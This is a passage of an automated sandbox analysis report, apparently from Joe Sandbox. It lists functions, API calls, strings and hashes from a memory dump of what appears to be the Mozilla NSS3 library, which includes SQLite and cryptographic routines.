Part of subcall function 6C851200: PR_CallOnce.NSS3(6C952AA4,6C8512D0,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85125D
Part of subcall function 6C851200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C85126F
Part of subcall function 6C851200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C851280
Part of subcall function 6C851200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C85128E
Part of subcall function 6C851200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C85129A
Part of subcall function 6C851200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8512A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C80447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C80448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C804494

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: cf3b76a4772f236ebd9a117bb022598f6fb4bc96df035fef293fdb688995f178
Instruction ID: 7c4340246c7e80f8a20e42db7a4340e276222ec48ba9f6d7e321760e1c80b7e0
Opcode Fuzzy Hash: cf3b76a4772f236ebd9a117bb022598f6fb4bc96df035fef293fdb688995f178
Instruction Fuzzy Hash: BB1193B2E01B049BD730CF259D805A7B7F8FFA9218B144F3EE98D52A00F371B5988690

Function 6C90CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C90D086
PR_Malloc.NSS3(00000001), ref: 6C90D0B9
PR_Free.NSS3(?), ref: 6C90D138

Strings

>, xrefs: 6C90CF5B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 776ae7b59610dbe40af04a86d57dfdb5048abc7f6b3567d71c7139cc7826d3ef
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: B4D16D63B4564A4BFB18487C8CA13FA77A78B43378F58032DD5219BBE6E919C943C352

Function 6C8AAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafbd1135b48144af8e39121ffa441980e4209f76b69b2b301dcae92046bf6c6
Instruction ID: a8a699083982987b5d4d2a40d92cffebd7ce90f4dd0385855d780e8a9446d3d4
Opcode Fuzzy Hash: fafbd1135b48144af8e39121ffa441980e4209f76b69b2b301dcae92046bf6c6
Instruction Fuzzy Hash: 58F1E271E0915ACBDB24DFA8CA403BAB7F0AB4A309F65863DC515D7B40E7709952CBC0

Function 6C8825B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C865A85), ref: 6C882675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C882659

Part of subcall function 6C833850: TlsGetValue.KERNEL32 ref: 6C83389F
Part of subcall function 6C833850: EnterCriticalSection.KERNEL32(?), ref: 6C8338B3
Part of subcall function 6C833850: PR_Unlock.NSS3(?), ref: 6C8338F1
Part of subcall function 6C833850: TlsGetValue.KERNEL32 ref: 6C83390F
Part of subcall function 6C833850: EnterCriticalSection.KERNEL32(?), ref: 6C833923
Part of subcall function 6C833850: PR_Unlock.NSS3(?), ref: 6C833972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C882697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C865A85,?,6C865A85), ref: 6C882717

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 797e9d8ed55cfaabd632f48ca2b466826435f884b5275a442bfb661e70bd89f9
Instruction ID: 44db6b3addc2f1756937208ac3c8e6dc9b98df9712277920573d9257ee074195
Opcode Fuzzy Hash: 797e9d8ed55cfaabd632f48ca2b466826435f884b5275a442bfb661e70bd89f9
Instruction Fuzzy Hash: EC413671A093846BFB31CE19CD85FDB73E8EFC0714F204918E94406A89EB359C8587D2

Function 6C7D8540 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 782COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000011C,automatic index on %s(%s),?,00000001), ref: 6C7D8705

Strings

BINARY, xrefs: 6C7D8B02, 6C7D8DA2, 6C7D8E27, 6C7D8E60
automatic index on %s(%s), xrefs: 6C7D86FB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: BINARY$automatic index on %s(%s)
API String ID: 632333372-611788421
Opcode ID: b3b4d9bbff81a96d8edc3ead827e4650f6005744fea1bce2caad00406ec66db7
Instruction ID: f6bea454154018af26abf9a596ee85ec07f60b5aa8123165d35e5d523e2fab55
Opcode Fuzzy Hash: b3b4d9bbff81a96d8edc3ead827e4650f6005744fea1bce2caad00406ec66db7
Instruction Fuzzy Hash: 4162B074A083419FD704CF28C580B1AB7F1FF89358F159A6EE899AB751D731E846CB82

Function 6C7C64D0 Relevance: 5.7, Strings: 4, Instructions: 724COMMON

Download Yara Rule

Strings

WByl, xrefs: 6C7C655C
WByl, xrefs: 6C7C679E
not authorized, xrefs: 6C7C6D47, 6C7C6D4C
authorizer malfunction, xrefs: 6C7C6E3E

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID: WByl$WByl$authorizer malfunction$not authorized
API String ID: 0-3081238543
Opcode ID: c997a95d46c031895101ec125a24a0ae69001e91a345168864f9e98e4c2310d2
Instruction ID: 74c7c9407a07ac0f8443248b0766b0a10789230317a81467387f00df5f3a8c0a
Opcode Fuzzy Hash: c997a95d46c031895101ec125a24a0ae69001e91a345168864f9e98e4c2310d2
Instruction Fuzzy Hash: 28629F70A04205CFDB14CF29C5C4AA9BBF2FF89308F2481ADD9159B766D736E916CB81

Function 6C786F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

sz=[0-9]*, xrefs: 6C787049
noskipscan*, xrefs: 6C787067
*?[, xrefs: 6C787034, 6C787052, 6C787070
unordered*, xrefs: 6C78702B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: bdacbf3cb9b9ff1ccdeef8e58f83fe06e1c4acda75a59b066c7a6c90571a2bc1
Instruction ID: ec770711aba99bbc6b4226cc0ef6cc6480a519f9a46997480956943ffd014620
Opcode Fuzzy Hash: bdacbf3cb9b9ff1ccdeef8e58f83fe06e1c4acda75a59b066c7a6c90571a2bc1
Instruction Fuzzy Hash: 03719D32F162114BEB108E6DC98039A77A29FC1318F250278DE6AABFD2D7719D4687D1

Function 6C81EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C81F0F9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: c65d155ec9bce2d4c6bc4687ac65d07fa9660a35d9142a48aa4c85587d539d65
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 5691A171A0861A8FCB24CF68C9906AEB7F1BF95324F144A2DD962A7BC0D730A905CB51

Function 6C842F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C867929), ref: 6C842FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C867929), ref: 6C842FE0

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: a7424096fb67be1d208c1abed7fc3670b4fc66bb7f52bf842906eb4c4cb7ee2d
Instruction ID: 6c6900aa55f4a4f8d7dbb7cceaa8913bb89ccf8f1b6d9a6b973de91a76959df8
Opcode Fuzzy Hash: a7424096fb67be1d208c1abed7fc3670b4fc66bb7f52bf842906eb4c4cb7ee2d
Instruction Fuzzy Hash: B9512371A0892D8FC7348F59CA80B6A73B1FF4131AF258A39D9099BB01D735ED42CB81

Function 6C7E6410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C7E6401,?,?,0000001C), ref: 6C7E6422
WSAGetLastError.WSOCK32(?,?,?,?,6C7E6401,?,?,0000001C), ref: 6C7E6432

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: 31618a45271f55125747a552df6bace35d6a4320fd04e0f75d76e9ef5339c014
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 37E01D362501086FCB019F74DC0486A3795AF2D26CB50C564F969C7671E631D6659750

Function 6C860E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C861052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C861086

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 1ffaecf2134dd40167c284e12e66f4001767a042836b234816317755c80cc6e9
Instruction ID: 50aa7a529d8f3a2421bd00b962fe6593cfa1fe576936f4c940eb1cb204c844b7
Opcode Fuzzy Hash: 1ffaecf2134dd40167c284e12e66f4001767a042836b234816317755c80cc6e9
Instruction Fuzzy Hash: ACA15F71F0125A9FCF18CFAAC990AEEB7B6BF48314B148529E915A7B00D735EC11CB94

Function 6C78AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C78AE9F
winUnlock, xrefs: 6C78AE18

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 70ccb567820ada2824400b1429d8f911947e11f5fb6660c671bf6a155d4f74a6
Instruction ID: 42e67650220f4f6e452be8494df7a531138c46a68e6e5b59969cae5f420f0c14
Opcode Fuzzy Hash: 70ccb567820ada2824400b1429d8f911947e11f5fb6660c671bf6a155d4f74a6
Instruction Fuzzy Hash: 6B7180706092449FDB04DF28D881AABBBF5FF89318F24CA28F94997241D730E985CBD1

Function 6C84ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C84EE3D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 455195c384a3b5beaf4a078efb546b725beec47bfc47599f669f9f60ab255fa0
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: EB71D172E017098FD728CF59CA8066AFBF2AF98304F158A6DD85697B91D774E900CB90

Function 6C784DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C785125

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: 35d23306f87d18daf85ba1e7bfb8800f02ba0ecd7157bf485c6cb5833421d382
Instruction ID: 4e1d39e02dd2ff49da13e1593356bb1346fd06cb2f6a5d71c3516a9a291da124
Opcode Fuzzy Hash: 35d23306f87d18daf85ba1e7bfb8800f02ba0ecd7157bf485c6cb5833421d382
Instruction Fuzzy Hash: 3AE14B70A09340CFDB45EF28D58465ABBF0FF89308F658A2DE98997351E7709985CF82

Function 6C80E5F0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterExitMonitorSectionUnlockValue
String ID:
API String ID: 344640607-0
Opcode ID: 2ef82a2a394d579271a3e34be85446c145c784e434f9f3e97ece9b0f83760da0
Instruction ID: 46cc27b6272e2304093684156b5f47ea85d1a330127f97c32328f8c9741ae01a
Opcode Fuzzy Hash: 2ef82a2a394d579271a3e34be85446c145c784e434f9f3e97ece9b0f83760da0
Instruction Fuzzy Hash: B6D1BFB1E046189BEB219F64EE407AF77B5BF45318F080938D89567B00E735E819CBD2

Function 6C80A430 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9743df23c5363cd9bf5aa2262a941bd4e52c970e8044f4073b81ed380455cb
Instruction ID: 0121579a4f1346dd01bc10d83f09eb28aa21d3be564e5190172148a612b0589a
Opcode Fuzzy Hash: 4f9743df23c5363cd9bf5aa2262a941bd4e52c970e8044f4073b81ed380455cb
Instruction Fuzzy Hash: 07817D717012098FDB28CF58DA85BEABBE4FF88308F15856DE81A9B750DB74D941CB80

Function 6C7E8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a637f06603b49121224d41ef56b2a7f3fe6daf5dbf0340fac9c0ad39bbfb83
Instruction ID: 2781681cbc0d1508f18d0c1e2da102b5174451b18c5a70c1ada76bb75e785f64
Opcode Fuzzy Hash: e9a637f06603b49121224d41ef56b2a7f3fe6daf5dbf0340fac9c0ad39bbfb83
Instruction Fuzzy Hash: 5511C133A042158FD714DF28D98875AB3A9FF4A31CF18427AD8158FA41D775D896C7C1

Function 6C8C0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466b51ebd936018bfc61b53a86d628173e3b0e8b7c036bfc44db49c6ccc0bb71
Instruction ID: 8a974ad8328820566a9baa8b1163ab31d51eac834ca5d6df476686d802a5808c
Opcode Fuzzy Hash: 466b51ebd936018bfc61b53a86d628173e3b0e8b7c036bfc44db49c6ccc0bb71
Instruction Fuzzy Hash: B311E774704309CFCB20DF18C88466677B5FF85368F14846DD8198B701DB31E806CBA1

Function 6C8344C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
